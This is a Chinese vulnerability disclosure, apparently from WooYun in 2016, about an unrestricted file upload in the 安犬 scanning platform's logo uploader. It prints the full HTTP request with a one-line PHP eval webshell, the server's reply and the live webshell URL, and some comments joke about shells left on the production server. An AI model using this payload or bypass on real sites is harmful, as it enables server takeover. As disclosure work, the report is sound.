安犬漏洞扫描云平台可直接 getshell

账户中心 -> 基础设置 -> 上传 LOGO 处通过 JS 限制了上传的文件类型，抓包修改后缀名为 PHP，即可直接上传 webshell。如下：

POST /acount/users/uploadCompanyLogo HTTP/1.1
 Host: www.aqdog.com
 Connection: keep-alive
 Content-Length: 208
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: https://www.aqdog.com
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAdHqYb7YWb9OytK
 Referer: https://www.aqdog.com/basicInformation/basic
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ru;q=0.2,zh-TW;q=0.2
 Cookie: *
 
 ------WebKitFormBoundaryTAdHqYb7YWb9OytK
 Content-Disposition: form-data; name="img"; filename="shell.php"
 Content-Type: image/png
 
 <?php eval($_POST[shell])?>
 ------WebKitFormBoundaryTAdHqYb7YWb9OytK--

服务器返回

HTTP/1.1 200 OK
 Server: Tengine
 Date: Tue, 08 Mar 2016 10:20:43 GMT
 Content-Type: text/html; charset=UTF-8
 Connection: keep-alive
 Vary: Accept-Encoding
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Access-Control-Allow-Origin: *
 Access-Control-Allow-Headers: X-Requested-With
 Access-Control-Allow-Methods: GET,POST,OPTIONS
 Content-Length: 28
 
 {"code":0,"msg":"shell.php"}

webshell 地址：https://www.aqdog.com/img/shell.php

webshell 地址：https://www.aqdog.com/img/shell.php

1. 限制上传文件的类型

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-09 17:31

厂商回复：

已确认，感谢白帽子关注我公司！

最新状态：

2016-03-09：已确认，修改中，谢谢白帽子！！

2016-03-09：已确认，感谢白帽子对我公司关注！！

1. 2016-03-08 18:38 | 举起手来 ( 核心白帽子 | Rank:1957 漏洞数:204 | 准备好，举起手来！)

   1

   ...

   1# 回复此人

2. 2016-03-09 00:50 | 猪猪侠 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了，还要自由干吗？)

   1

   呵呵，看他们那个宣传还是蛮厉害的样子

   2# 回复此人

3. 2016-03-09 10:12 | 数据流 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊，我们还有音乐)

   1

   好渣。

   3# 回复此人

4. 2016-03-09 15:10 | 点融网(乌云厂商)

   1

   自带特效

   4# 回复此人

5. 2016-03-09 15:47 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

   1

   装逼失败，实力打脸

   5# 回复此人

6. 2016-03-09 17:21 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

   1

   @点融网 自带特效，哈哈

   6# 回复此人

7. 2016-03-09 17:25 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不，，不要误会，我不是针对谁，我是说在座...)

   1

   我是围观群众

   7# 回复此人

8. 2016-03-09 20:26 | 心云 ( 普通白帽子 | Rank:534 漏洞数:146 | 有追求，才会有提高！尽快达到下一个目标!)

   1

   评论里的厂商好调皮

   8# 回复此人

9. 2016-03-09 21:40 | 乌云大嫖客 ( 路人 | Rank:6 漏洞数:2 | 鄙人可是装逼界第一高手)

   1

   求大神来一发源代码

   9# 回复此人

10. 2016-03-09 22:18 | zmx ( 普通白帽子 | Rank:164 漏洞数:43 | wooyun)

    1

    安全狗 安犬 是啥关系？

    10# 回复此人

11. 2016-03-10 08:39 | xfkxfk ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵！)

    2

    我的shell被谁删了。。。

    11# 回复此人

12. 2016-03-10 08:50 | 奥巴马 ( 路人 | Rank:8 漏洞数:2 | hello 握日~)

    1

    楼上的shell被我删了

    12# 回复此人

13. 2016-03-10 09:08 | 安全狗(乌云厂商)

    1

    @zmx 没有半毛钱关系，是两家独立的公司。

    13# 回复此人

14. 2016-03-10 10:03 | 伤心的猫猫 ( 普通白帽子 | Rank:115 漏洞数:32 | @sangfor,@qq,@alibaba,@baidu)

    1

    楼上的楼上的shell是被楼下拿shell的弟弟的妹夫删的。

    14# 回复此人

15. 2016-03-24 14:59 | 夏天吃西瓜 ( 路人 | Rank:2 漏洞数:1 | 事了拂衣去，深藏功与名。)

    1

    啪啪啪……打得好舒服

    15# 回复此人

16. 2016-03-29 17:45 | range ( 普通白帽子 | Rank:192 漏洞数:40 | 刷洞买mac)

    1

    其实厂商是故意的

    16# 回复此人